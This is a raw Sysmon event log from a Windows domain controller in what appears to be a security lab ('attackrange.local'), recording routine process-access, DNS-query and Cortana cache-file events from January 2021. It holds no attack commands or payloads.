13:58:33.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.305{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.305{59A5CD1D-93F9-6005-F204-00000000A301}42961312C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.101{59A5CD1D-8E56-6005-2A00-00000000A301}28644480C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.101{59A5CD1D-8E56-6005-2A00-00000000A301}28644480C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000012007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.330{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.usertrust.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 22542200x800000000000000012006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.284{59A5CD1D-8E56-6005-2E00-00000000A301}2464pki.intel.com0type: 5 certificates.intel.com.edgesuite.net;type: 5 a243.d.akamai.net;::ffff:23.48.23.42;::ffff:23.48.23.29;C:\Windows\sysmon64.exe 11241100x800000000000000012005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
